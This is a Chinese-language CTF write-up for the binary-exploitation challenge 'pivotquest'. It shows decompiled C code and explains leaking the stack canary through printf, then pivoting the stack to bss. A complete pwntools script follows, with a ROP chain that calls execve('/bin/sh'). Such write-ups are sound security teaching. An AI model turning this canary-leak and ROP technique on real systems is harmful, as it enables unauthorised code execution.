Pwn CTF pivotquest Writeup

kazma 成大資安社 創辦人/社長

Exploitation

先看一下這題的主邏輯:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int __fastcall main(int argc, const char **argv, const char **envp)
{
int edx; // edx
int ecx; // ecx
int r8; // r8d
int r9; // r9d
int edx2; // edx
int ecx2; // ecx
int r82; // r8d
int r92; // r9d
char v12[4]; // [rsp+8h] [rbp-28h] BYREF
unsigned int v13; // [rsp+Ch] [rbp-24h]
char buf[24]; // [rsp+10h] [rbp-20h] BYREF
unsigned __int64 canary; // [rsp+28h] [rbp-8h]

canary = __readfsqword(0x28u);
init(argc, argv, envp);
v13 = fork();
if ( v13 == -1 )
{
perror("fork error");
exit(1LL);
}
if ( !v13 )
{
puts(&unk_499018);
read(0LL, buf, 48LL);
printf((unsigned int)&unk_499037, (unsigned int)buf, edx, ecx, r8, r9);
exit(0LL);
}
waitpid(v13, v12, 0LL);
puts("Kid's missing... Again?");
read(0LL, buf, 96LL);
printf((unsigned int)&unk_499037, (unsigned int)buf, edx2, ecx2, r82, r92);
return 0;
}

有 canary 沒有 PIE,然後有兩個輸入點都可以 overflow,而且是 statically linked。
首先第一步是我們可以透過填滿 canary 前的空間讓他 printf 的時候一直印到 canary 的 null byte 為止,這樣我們就可以先取得 canary,然後再透過 migration 把 stack 搬到 bss 段,接著第二次輸入時就可以正常 rop 而且 /bin/sh 是在 bss 段了。

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *

p = process('./pivotquest')
elf = ELF('./pivotquest')

bss = elf.bss() + 0x500
main = elf.symbols['main']

pop_rax_ret = 0x451037
pop_rdi_ret = 0x401f9f
pop_rsi_ret = 0x409fce
syscall = 0x401d54
read2 = 0x4018b4
p.sendline(b'a' * 0x18)
p.recvuntil(b'a\n')
canary = u64(b'\x00' + p.recv(7))
print(hex(canary))

p.recvuntil(b'?\n')
p.send(b'a' * 0x18 + p64(canary) + p64(bss) + p64(read2))

payload = b'/bin/sh\x00' + b'a' * 0x10 + p64(canary) + p64(bss)

payload += flat([pop_rdi_ret, bss - 0x20,
pop_rsi_ret, 0,
pop_rax_ret, 59,
syscall])

p.send(payload)

p.interactive()

Pwned !!!

  • Title: Pwn CTF pivotquest Writeup
  • Author: kazma
  • Created at : 2024-11-11 19:44:15
  • Updated at : 2024-11-11 19:55:57
  • Link: https://kazma.tw/2024/11/11/Pwn-CTF-pivotquest-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwn CTF pivotquest Writeup